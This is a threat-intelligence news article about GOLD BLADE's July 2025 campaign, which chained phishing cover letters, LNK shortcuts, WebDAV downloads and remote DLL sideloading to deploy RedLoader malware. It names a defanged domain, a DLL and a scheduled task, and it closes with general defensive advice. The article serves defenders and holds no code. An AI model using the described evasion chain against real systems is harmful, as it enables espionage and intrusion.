In July 2025, the cybercriminal group known as GOLD BLADE, also referred to as RedCurl, Red Wolf, and Earth Kapre, launched a sophisticated campaign targeting Windows systems. This operation combined malicious LNK files with a WebDAV technique to deploy their custom RedLoader malware, marking a significant evolution in their attack strategies.
Background on GOLD BLADE
Active since 2018, GOLD BLADE has a history of conducting corporate espionage across various industries and countries, including Australia, Canada, Germany, Russia, Slovenia, the U.K., Ukraine, and the U.S. Their operations have consistently demonstrated adaptability and a high level of technical proficiency.
The Attack Chain
The campaign began with social engineering tactics, where the attackers distributed seemingly legitimate cover letter PDFs through reputable job platforms like Indeed.com. These documents contained links that, when clicked, automatically downloaded ZIP archives to the victim’s system. This method effectively initiated a multi-stage infection process.
Upon extraction, the ZIP files revealed LNK (shortcut) files designed to appear as standard documents. When executed, these LNK files triggered the Windows Console Host (conhost.exe) to establish a WebDAV connection to a domain hosted on CloudFlare, specifically `automatinghrservices[.]workers[.]dev`. This connection facilitated the download of a renamed version of Adobe’s legitimate ADNotificationManager.exe executable, which was disguised as a resume document to maintain the ruse.
Remote DLL Sideloading Mechanism
A critical aspect of this campaign was the remote DLL sideloading technique. The downloaded ADNotificationManager.exe, a legitimate and signed executable, was used to load a malicious DLL file named `netutils.dll` from the same remote directory. This approach allowed the attackers to execute malicious code without raising typical security alerts, as the process appeared legitimate.
Once executed, the first stage of RedLoader established persistence on the infected system by creating a scheduled task named `BrowserQE\BrowserQE_`. This task ensured that the malware remained active and could execute its payload consistently across different compromised systems.
Evolution of Attack Techniques
Sophos analysts noted that while GOLD BLADE had previously employed WebDAV techniques for remote DLL execution in September 2024 and DLL sideloading methods in March 2025, this July 2025 campaign was the first documented instance where these techniques were combined. This combination represents a significant advancement in their attack methodology, demonstrating their ability to adapt and integrate various techniques to enhance the effectiveness of their operations.
Implications and Recommendations
The use of legitimate system processes and trusted executables in this campaign underscores the challenges in detecting such sophisticated attacks. Traditional security measures may not be sufficient to identify and mitigate these threats.
To protect against similar attacks, organizations and individuals should consider the following measures:
1. Exercise Caution with Email Attachments and Links: Be wary of unsolicited emails, especially those containing attachments or links, even if they appear to come from reputable sources.
2. Implement Advanced Threat Detection Solutions: Utilize security solutions that can detect and respond to advanced threats, including those that exploit legitimate processes.
3. Regularly Update Security Protocols: Keep security software and protocols up to date to defend against evolving threats.
4. Educate Employees: Provide training on recognizing phishing attempts and other social engineering tactics to reduce the risk of successful attacks.
By staying informed about the latest attack vectors and implementing comprehensive security measures, organizations can better defend against sophisticated cyber threats like those posed by GOLD BLADE and their RedLoader malware.
